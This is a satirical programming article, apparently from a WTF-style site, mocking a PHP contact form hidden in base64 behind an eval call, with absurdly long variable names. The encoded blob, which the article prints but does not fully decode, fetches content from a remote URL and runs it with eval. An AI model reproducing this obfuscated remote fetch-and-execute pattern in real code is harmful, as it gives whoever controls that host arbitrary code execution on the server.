Andreas C stumbled upon what might possibly be the most secure code ever written. At least, according to its original author.

Following is the contents of just one of many similarly coded PHP pages...

<?PHP session_start();
$str = 'PD9waHAgc2Vzc2lvbl9zdGFydCgpOyAgDQoNCi8vL01BSUxQRVJNSU4vLy8NCmlmIChpc3NldCgkX1NFU1
NJT05bJ3o4MTJGNzA4QTE4MjYyOTJmUzY1NjlQNzY1QTc1MzE5MzV6NDg1MkU3NDhBNTgzMDI1MiddKSkgew0KICAk
X1NFU1NJT05bJ3g2MTBZNzA2QTE2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddID0gdG
ltZSgpOw0KICAkczMzMzdGNzMzQTQzMjg3NjdVNTE1NUE3NTFBNjEzMDU0OXgzODQySzczOEE0ODI5MjYyID0gDQog
ICAgYWJzKCRfU0VTU0lPTlsneDYxMFk3MDZBMTYyNjA5NGhTNDk1M1c3NDlBNTkzMDM1MVo2NDY4TDc2NEE3NDMxOD
M2J10gDQogICAgICAtICRfU0VTU0lPTlsnejgxMkY3MDhBMTgyNjI5MmZTNjU2OVA3NjVBNzUzMTkzNXo0ODUyRTc0
OEE1ODMwMjUyJ10pOyANCg0KICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1Nj
MwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0K
ICBpZiAoICgkX1NFU1NJT05bJ3MxNzIxVTcxN0EyNzI3MTgzdDI2RDcwMmExMjI2MDE5OHh5NzExVDcwN0ExNzI2MT
kzaiddID49IDIwKSAgDQogICAgICAgJiYgKCRzMzMzN0Y3MzNBNDMyODc2N1U1MTU1QTc1MUE2MTMwNTQ5eDM4NDJL
NzM4QTQ4MjkyNjIgPD0gMzAqIDYwICkpIHsNCiAgICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3
g0NjUwUzc0NkE1NjMwMDU0ID0gMzAgKiA2MCAtICR6MzIzNlQ3MzJBNDIyODY2OHU0MzQ3Wjc0M0E1MzI5NzU3eDQ2
NTBTNzQ2QTU2MzAwNTQ7DQogICAgZWNobyAieW91IGhhdmUgZXhjZWVkZWQgdGhlIG51bWJlciBvZiB0aW1lcyB5b3
UgYXJlIGFsbG93ZWQgdG8gdXNlIHRoaXMgZm9ybSA8YnI+PGJyPlBsZWFzZSB0cnkgYWdhaW4gaW4gYW4gb25lICgx
KWhvdXIgb3IgdGhyZWUoMyk8YnI+IjsNCiAgICBleGl0Ow0KICB9DQogIGVsc2VpZiAoJHMzMzM3RjczM0E0MzI4Nz
Y3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA+IDMwKiA2MCApIHsNCiAgICBzZXNzaW9uX3Vuc2V0
KCk7IA0KICAgICRfU0VTU0lPTlsnczE3MjFVNzE3QTI3MjcxODN0MjZENzAyYTEyMjYwMTk4eHk3MTFUNzA3QTE3Mj
YxOTNqJ10gPSAwOw0KICB9CQ0KfSANCmlmIChpc3NldCAoJF9TRVNTSU9OWyd5NzExVDcwN0ExNzI2MTkzalM1NzYx
VDc1N0E2NzMxMTQzWjU2NjBZNzU2QTY2MzEwNDQnXSkpIHsNCiAgJF9TRVNTSU9OWyd4NjEwWTcwNkExNjI2MDk0aF
M0OTUzVzc0OUE1OTMwMzUxWjY0NjhMNzY0QTc0MzE4MzYnXSA9IHRpbWUoKTsNCiAgJHMzMzM3RjczM0E0MzI4NzY3
VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA9IA0KICAgIGFicygkX1NFU1NJT05bJ3g2MTBZNzA2QT
E2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddIA0KICAgICAgLSAkX1NFU1NJT05bJ3k3
MTFUNzA3QTE3MjYxOTNqUzU3NjFUNzU3QTY3MzExNDNaNTY2MFk3NTZBNjYzMTA0NCddKTsNCg0KICAkejMyMzZUNz
MyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUx
NTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0KDQogIGlmICgkejMyMzZUNzMyQTQyMjg2Njh1ND
M0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID4gMikgew0KICAgICRfU0VTU0lPTlsneDIyMjZENzIyQTMy
Mjc2NzhUNjY3ME83NjZBNzYzMjAzNHkzMTM1WTczMUE0MTI4NTY5J10gPSAiIjsNCiAgfQ0KfQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkvLy9NQUlMUEVSTUlOLy8vDQoNCiRpZF9oZCA9ICc4OEJCLTU4MjInOw0KJGlkX251bSA9ICdmZ2ho
aWprbGtsbW5vcHFyc3R2dnZ3eHd5eUJESkxOUVNVWVphWmRlZmhra21tbnBwcXN2eUFCREVGSUxRVVhYWVhXVE9JeG
tXSnluZldOSUN6dXFsZmFWUExHQXRsZmJWU09MS0lJSkxQVmFmbHJ5SFNkbXhHUGJpckFKVWd1RlEnOw0KPz4NCjw/
cGhwIA0KDQokbXlfdmFyID0gJyc7DQokcGFnZV9kYXRhID0gPDw8IFBBR0VfREFUQQ0KUEFHRV9EQVRBOw0KJFk2Mz
Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSA9IEBmb3BlbiAoImh0dHA6Ly93
d3cuc3BhbWZyZWVjb250YWN0LmNvbS9lcnIvP189NDAyJm9rPSRpZF9udW0iLCAiciIpOw0KaWYgKCEkWTYzNjdLNz
YzQTczMzE3MzdXODU4OUI3ODVBOTUzMzkxNVU5MTk1Tzc5MUExMDEzNDUxKSB7DQogIC8qIGVjaG8gIjxwPlVuYWJs
ZSB0byBvcGVuIHJlbW90ZSBmaWxlLiI7ICovIA0KICAvKiBleGl0OyAqLw0KfQ0KZWxzZSB7DQoNCiAgd2hpbGUgKC
FmZW9mKCRZNjM2N0s3NjNBNzMzMTczN1c4NTg5Qjc4NUE5NTMzOTE1VTkxOTVPNzkxQTEwMTM0NTEpKSB7DQogICAg
JFk1NTU5VTc1NUE2NTMwOTQ1dzI5MzNINzI5QTM5MjgzNzF2NDhINzA0QTE0MjYwMzk2dyAuPSBmZ2V0cyAoJFk2Mz
Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSwgMTAyNCk7DQogIH0NCiAgZXZh
bCAoJyA/PicgLiAkWTU1NTlVNzU1QTY1MzA5NDV3MjkzM0g3MjlBMzkyODM3MXY0OEg3MDRBMTQyNjAzOTZ3IC4gJz
w/cGhwICcpOw0KICBmY2xvc2UoJFk2MzY3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAx
MzQ1MSk7DQp9DQoNCmlmICgoJGdvdHRlbiA9PSAxMTEpJiYoJGhkID09ICRpZF9oZCApKSB7DQogIGluY2x1ZGUgKC
dpbml0cm9kZUdsb2JhbF9jb20ucGhwJyk7DQp9IA0KZWxzZWlmICgkZ290dGVuICE9IDExMSkgeyANCiAgaW5jbHVk
ZSAoJ2luaXRyb2RlR2xvYmFsX2NvbS5waHAnKTsNCn0gDQplbHNlaWYgKCgkZ290dGVuID09IDExMSkmJigkaGQgIT
0gJGlkX2hkICkpIHsNCiAgZWNobyAkZXJyb3JfbXNnOw0KfSANCj8+'; $str2 = base64_decode($str); /* echo '<pre>'.$str2.'</pre>'; */ /* exit(); */ eval (' ?' . '>' .$str2 . '<' . '?php ');?>

 

Of course, base-64 encoding was not the original coder’s only line of defense. Just in case a clever hacker gained access to the server containing the PHP code files, and figured out how to decode base-64, the hacker would likely hit a wall against these impossibly-long variable names in the decoded code...

///MAILPERMIN///
if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) {
  $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
  $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = 
    abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] 
      - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']); 
  
  $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 
    = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;
  
  if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20)  
       && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) {
    $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 
      = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054;
    echo "you have exceeded the number of times you are allowed to use this form
          <br><br>Please try again in an one (1)hour or three(3)<br>";
    exit;
  
  ...

 

Of course, the full code is certainly worthwhile checking out. So, hackers, go forth and decode.

As for what this super-secret-sensitive page was used for... it was a “Contact Us” form.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!